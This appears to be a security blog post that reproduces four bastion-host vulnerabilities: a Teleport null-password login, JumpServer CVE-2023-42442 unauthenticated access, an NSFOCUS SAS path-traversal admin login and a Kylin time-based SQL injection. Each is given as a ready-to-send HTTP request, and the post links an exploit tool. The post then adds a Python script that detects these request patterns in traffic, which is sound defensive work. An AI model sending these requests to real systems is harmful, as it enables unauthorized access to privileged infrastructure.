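Security: Cloud Service Attack and Defense, Day 100: Cloud Products & Bastion Host Scenarios & JumpServer & NSFOCUS SAS & Teleport & Kylin & Qizhi
Yatming's Blog

Teleport (small-scale) - arbitrary user login
```
post:/auth/do-login
args={"type":2,"username":"admin","password":null,"captcha":"xxxx","oath":"","remember":false}
```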



JumpServer (widely used) - CVE-2023-42442 unauthorized access vulnerability reproduction
Exploit tool: https://github.com/tarihub/blackjump
CVE-2023-42442 JumpServer unauthorized access vulnerability reproduction
Reference article: https://mp.weixin.qq.com/s/NCSnTsOMxslmf5S6d9896A
Reproduction:
```
GET /api/v1/terminal/sessions/ HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive
```

NSFOCUS SAS bastion host - arbitrary user login vulnerability
Reference article: https://mp.weixin.qq.com/s/CtswTTvuzyQXuUNMKzRHBg
Reproduction:
```
GET /api/virtual/home/status?cat=../../../../../../../../../../../../../../usr/local/nsfocus/web/apache2/www/local_user.php&method=login&user_account=admin HTTP/1.1
Host: xx.xx.xx.xx
Cookie: PHPSESSID=03eea4323452c328c6462f1bb50a0a9b; Hm_lvt_2743f882f7de0bd7d8ffc885a04c90f5=1692345507; Hm_lpvt_2743f882f7de0bd7d8ffc885a04c90f5=1692345507; left_menustatue_NSFOCUSnbspSASH=0|0|https://yzyx.loogear.com/home/status
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close
```


Kylin bastion host - SQL injection
Reference article: https://blog.csdn.net/qq_41904294/article/details/132328217
```
POST /baoleiji/api/tokens HTTP/1.1
Host: xx.xx.xx.xx
Cookie: PHPSESSID=66b53a13d3db0e27a9676d419c374c42
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 91

constr=1' AND (SELECT 6999 FROM (SELECT(SLEEP(10)))ptGN) AND'AAdm'='AAdm&title=%40127.0.0.1
```
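For detection, the four request shapes shown above (Teleport, JumpServer, NSFOCUS SAS, Kylin) can be matched in captured proxy or WAF traffic. The following is an added example, not code from the original post or from any of the vendors; the rule names, the `BENIGN` and `TRAVERSAL` samples and the host `bastion.example` are constructed, and it assumes the Teleport `args` value arrives as a form field carrying JSON.

```python
import json
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Coarse indicator: a quote or SQL keyword in a field that should hold neither.
SQLI = re.compile(r"'|\b(?:select|sleep|benchmark|union)\b", re.I)

def parse_request(raw):
    """Split a raw HTTP/1.1 request into method, path, query, headers, form."""
    head, _, body = raw.replace("\r\n", "\n").strip().partition("\n\n")
    lines = head.split("\n")
    method, target = lines[0].split()[:2]
    url = urlsplit(target)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method.upper(), url.path, parse_qs(url.query), headers, parse_qs(body)

def detect(raw):
    """Return the names of the rules a request matches (empty list if none)."""
    _, path, query, headers, form = parse_request(raw)
    hits = []
    if path == "/auth/do-login":
        try:  # assumption: 'args' is a form field carrying JSON
            args = json.loads(form.get("args", ["{}"])[0])
        except ValueError:
            args = {}
        if isinstance(args, dict) and args.get("password", "") is None:
            hits.append("teleport-null-password")
    if path.startswith("/api/v1/terminal/sessions") and not (
            headers.get("cookie") or headers.get("authorization")):
        hits.append("jumpserver-no-credentials")
    if path == "/api/virtual/home/status":
        cat = unquote(query.get("cat", [""])[0])  # second decode: double encoding
        if "../" in cat or "..\\" in cat:
            hits.append("sas-cat-traversal")
    if path == "/baoleiji/api/tokens" and SQLI.search(form.get("constr", [""])[0]):
        hits.append("kylin-constr-sqli")
    return hits

# Constructed sample: an authenticated session listing (no rule fires).
BENIGN = "GET /api/v1/terminal/sessions/ HTTP/1.1\nCookie: sessionid=constructed\n\n"
# Constructed sample: traversal in 'cat', reduced from the request on this page.
TRAVERSAL = ("GET /api/virtual/home/status?cat=..%2F..%2Flocal_user.php"
             "&method=login&user_account=admin HTTP/1.1\nHost: bastion.example\n\n")

if __name__ == "__main__":
    print(detect(BENIGN), detect(TRAVERSAL))
```

These rules see the request only; pairing a hit with the response status (for example a 200 on the unauthenticated session listing) separates probing from successful access.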

